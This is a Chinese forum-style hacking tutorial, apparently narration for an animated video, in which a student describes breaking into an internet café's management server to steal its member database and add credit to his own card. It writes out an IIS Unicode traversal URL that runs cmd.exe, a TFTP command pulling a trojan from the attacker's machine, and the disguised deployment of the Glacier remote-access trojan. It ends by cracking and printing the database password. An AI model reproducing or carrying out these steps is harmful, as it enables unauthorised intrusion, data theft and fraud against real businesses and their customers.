大家好!偶是第一次做教程!做的不好!8要怪偶哟````嘿嘿!
其实这次入侵的过程我已经在论坛上写了一遍,但是还是有很多朋友不懂,所以我决定做成动画!让大家明白到底怎么弄的!
我目前还是一名在校的学生`所以我很了解家里没有电脑而要去网吧上网可手上钱又不够的那种滋味!我最近也没什么钱了!为了能天天上网但是又不用给钱,所以我决定入侵一家我经常去的网吧!这次的目的是拿到会员数据库`给自己的卡里面狂加钱!!嘿嘿!现在开始咯```
先是收集信息,我所在的网吧是用pubwin4来管理整个网吧!主机的局域网IP地址是192.168.100.1,操作系统是windows NT!先用x_scan对主机扫一下把!这里就不扫描了哈!不耽误大家时间了,我已经扫出来了!现在来看下扫描结果!!哈哈!看到没有!发现了大量的unicode编码漏洞!具体是怎么利用的,大家可以去搜索下这方面的资料!
然后该TFTP出场了,,打开TFPT哦!~~记得不要关了,TFTP的功能是用本地机器上传任何文件到目标机!随便找个unicode编码漏洞把!打开http://192.168.100.1/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
呵呵!看到了没有!c:\inetpub\scripts目录下的文件全部被显示了!呵呵!这个漏洞的作用就是可以让我们通过IE调用任何系统命令!
呵呵!我传个木马上去!格式为 Example:tftp -i Myip get idq.dll d:\\inetpub\\scripts\\idq.dll
要注意哦,,,,asp木马要和TFTP.EXE放在同一文件夹下面!好了!现在可以进去了!pubwin4的会员数据库一般在c\Program Files\Hintsoft\Pubsrv\Database\Member下面!我们找找看!嘿嘿!真的在这里!
好拉!~下载数据库````!!!5555555555555555555.................郁闷,,,下载不鸟``~!~~~(哪位高手能解释下是什么原因啊????)
倒死```,.,,,,我再换个asp木马试试``!!!``唉`还是不行``!晕``!
嘿嘿`想到 了!~~还有冰河呢 `!~好!先配置好服务端`!然后把server.exe改下名字,别让人认出来了!~随便取个名字把``!~就ie.exe把``!呵呵!上传到一个秘密的地方`让人不容易找!好`就传到c:\winnt\system32里面把!`!然后执行它! 方法是,在asp木马的cmd命令行里面输入
start c:\winnt\system32\ie.exe (如果没有成功的话`在asp木马里面有执行程序的功能!用asp木马执行一次)
好!打开冰河客户端``添加主机IP,输入连接密码!就是你配置冰河服务端时候输入的密码!,,
OK!连接上了! 进入 c\Program Files\Hintsoft\Pubsrv\Database\Member下面,把member.mdb下载下来把!OK!!!!大功告成!!因为我的机器上面没安装Access,,所以我打不开member.mdb,也修改不了里面的数据!今天没时间下载Access,那我今天就只把member.mdb里面的内容给大家看一下!所以我下载了一个非常小的一款 mdb数据库浏览器 `!这玩意只能浏览数据,不能修改数据!OK!`~打开member.mdb,倒`````还需要密码啊!!幸亏还有Accesspass在手上`!嘿嘿!专门破解mdb的密码!呵呵!密码看到了没啊?!ajsgamrbg3721md,还真长呀!好拉!我们打开看看,,,,哇。好多会员哦!别眼红哟``!这次发拉```!!!!!呵呵!
好拉`!今天就到这里拉`!拜拜!
QQ 178737315 |
